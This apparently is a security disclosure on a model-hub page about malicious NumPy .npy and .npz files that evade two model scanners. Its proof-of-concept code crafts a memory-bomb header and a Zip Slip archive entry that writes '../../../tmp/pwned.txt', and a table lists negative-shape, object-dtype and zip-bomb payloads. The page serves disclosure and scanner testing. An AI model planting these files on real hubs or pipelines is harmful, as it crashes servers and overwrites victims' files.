NPY/NPZ: Memory Bomb via Crafted Shape, Zip Slip in NPZ Archives, Object Dtype Bypass

Summary

Three non-pickle attack classes against NumPy's .npy and .npz model file formats that bypass both picklescan 1.0.4 and modelscan 0.8.8 (100% evasion rate across 5 payloads):

  1. Memory bomb via crafted header shape β€” A .npy file with shape: (1000000, 1000000) but 4 bytes of data triggers a 3.64 TiB memory allocation attempt, crashing the process. No pickle involved.
  2. Zip Slip in .npz archives β€” NPZ files are ZIP containers. Injecting ../../../tmp/pwned as a ZIP entry name achieves arbitrary file write when the archive is extracted to disk.
  3. Object dtype forces pickle β€” Setting descr: 'O' (object dtype) in the NPY header forces numpy to use pickle deserialization even when the user believes they're loading numeric data. This is NOT blocked by allow_pickle=False β€” it raises an error, but the dtype is processed from the header before the check, and the header itself can be manipulated to confuse downstream tools.

Formats: NPY, NPZ ($1,500 MFV each) Scanners tested: picklescan 1.0.4 + modelscan 0.8.8 β€” 5/5 MISSED by both

Payloads

File Attack Impact picklescan modelscan
npy_shape_bomb.npy Header claims shape (1M, 1M), file has 4 bytes MemoryError: Unable to allocate 3.64 TiB β€” DoS MISSED MISSED
npy_negative_shape.npy Header claims shape (-1,) ValueError crash β€” DoS MISSED MISSED
npy_object_descr.npy Header sets descr: 'O' (object) Forces pickle path, confuses tooling MISSED MISSED
npz_zipslip.npz ZIP entry named ../../../tmp/pwned.txt Arbitrary file write on extraction MISSED MISSED
npz_zipbomb.npz 10KB compressed β†’ 10MB+ decompressed Decompression DoS MISSED MISSED

Vulnerability Details

Memory bomb (CWE-400)

The NPY format has a plain-text header containing a Python dict with shape. NumPy allocates product(shape) * dtype_size bytes based on the header, WITHOUT checking that the file actually contains that much data:

# Crafted NPY header:
# {'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}
# File is only 100 bytes total
# numpy tries to allocate 1M * 1M * 4 = 4 TB β†’ instant OOM

arr = np.load("npy_shape_bomb.npy")
# MemoryError: Unable to allocate 3.64 TiB

Attack: Upload to model hub β†’ victim loads β†’ process crashes β†’ DoS on inference server.

Zip Slip (CWE-22)

NPZ files are standard ZIP archives. np.load() reads them in-memory (safe), but any tool that extracts NPZ files to disk (model registries, pipeline caches, data loaders) is vulnerable:

import zipfile, io, numpy as np

with zipfile.ZipFile("malicious.npz", 'w') as zf:
    buf = io.BytesIO()
    np.save(buf, np.array([1.0]))
    zf.writestr("weights.npy", buf.getvalue())
    zf.writestr("../../../tmp/pwned.txt", b"PWNED")

# np.load reads in-memory (safe)
# But: extractall(), shutil.unpack_archive(), or ZipFile.extract() write to disk

Negative shape (CWE-20)

Shape (-1,) is not validated in the header parser:

# Header: {'descr': '<f4', 'fortran_order': False, 'shape': (-1,)}
np.load("npy_negative_shape.npy")
# ValueError: Failed to read all data for array. Expected (-1,) = -1 elements

This causes undefined behavior in size calculations. Libraries wrapping numpy that compute total_size = product(shape) * itemsize get negative results β†’ integer underflow.

Proof of Concept

import struct, numpy as np, zipfile, io

# Memory bomb
def craft_npy(header_str, data=b''):
    magic = b'\x93NUMPY\x01\x00'
    header = header_str.encode('latin1')
    pad = 64 - (10 + len(header)) % 64
    if pad < 1: pad += 64
    header = header + b' ' * (pad - 1) + b'\n'
    return magic + struct.pack('<H', len(header)) + header + data

with open("npy_shape_bomb.npy", 'wb') as f:
    f.write(craft_npy("{'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}", b'\x00' * 4))

# Zip Slip
with zipfile.ZipFile("npz_zipslip.npz", 'w') as zf:
    buf = io.BytesIO(); np.save(buf, np.array([1.0]))
    zf.writestr("weights.npy", buf.getvalue())
    zf.writestr("../../../tmp/pwned.txt", b"PWNED via NPZ zip slip")

References

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support